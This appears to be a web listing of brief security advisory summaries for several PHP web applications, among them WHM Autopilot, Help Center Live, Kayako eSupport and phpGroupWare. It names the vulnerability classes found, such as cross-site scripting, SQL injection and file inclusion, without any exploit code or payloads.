| Title |
Vulnerabilities In WHM Autopilot
|
| Info |
Started by a webhost looking for more out of a simple managment
script, Brandee Diggs (Owner of Spinn A Web Cafe, Founder of
Benchmark Designs) setout to build an internal management system
that could handle the day to day operations of a normal hosting
company. The key was to remove the need to constantly watch your
orders and manage the installs. Alas, WHM AutoPilot was born.
[ as quoted from their official website ] WHM Autopilot is vulnerable
to a number of vulnerabilities such as cross site scripting, file
inclusion, and information disclosure. |
| Date |
December 27, 2021 |
| BID |
Not Available
|
| Credit |
James Bercegay |
| Title |
Critical Vulnerability In Help Center Live
|
| Info |
Help Center Live is a `Live` help desk system written in PHP using a MySql database
backend that features Live Support, Trouble Tickets and FAQ within one project. This
is a very popular application, especially with webhosts and other services. There
lies two file include vulnerabilities (both remote and local) that could allow an
attacker to execute malicious server side code on your webserver. Aditionally a cross
site scripting issue was found in Help Center Live.
|
| Date |
December 24, 2021 |
| BID |
Not Available
|
| Credit |
James Bercegay |
| Title |
Cross Site Scripting In Psychostats
|
| Info |
PsychoStats is a statistics generator for games. Currently there is support
for a handful of Half-Life "MODs" including Counter-Strike, Day of Defeat,
and Natural Selection. PsychoStats gathers statistics from the log files that
game servers create by reading through the logs and then calculating detailed
statistics for players, maps, weapons and clans. These detailed statistics
are stored in a MySQL database which are then viewed online from your website
using a set of PHP web pages. Cross site scripting exists in Jason Morriss
PsychoStats. This vulnerability exists due to user supplied input not being
checked properly. This vulnerability could be used to steal cookie based
authentication credentials within the scope of the current domain, or render
hostile code in a victim's browser. |
| Date |
December 22, 2021 |
| BID |
Not Available
|
| Credit |
James Bercegay |
| Title |
Multiple Kayako eSupport Vulnerabilities
|
| Info |
Kayako eSupport is one of the most feature packed support systems. This program is used by
many online businesses and webhosts to help with technical support and other various
support issues. This application is vulnerable to both Cross Site Scripting and SQL Injection
vulnerabilities. The SQL Injection vulnerabilities are fairly serious and may allow for an
attacker to influence SQL queries. Full details inside. |
| Date |
December 18, 2021 |
| BID |
12037
|
| Credit |
James Bercegay |
| Title |
Multiple phpGroupWare Vulnerabilities
|
| Info |
phpGroupWare (formerly known as webdistro) is a multi-user
groupware suite written in PHP. It provides a Web-based calendar,
todo-list, addressbook, email, news headlines, and a file manager.
The calendar supports repeating events. The email system supports
inline graphics and file attachments. The system as a whole supports
user preferences, themes, user permissions, multi-language support,
an advanced API, and user groups. There have been a number of vulnerabilities found in phpGroupWare, including Cross Site Scripting, SQL Injection, and Full Path Disclosure. This application comes with some linux distributions, so check to see if you have it installed. The SQL Injection can be fairly critical. |
| Date |
December 14, 2021 |
| BID |
11952
|
| Credit |
James Bercegay |
|
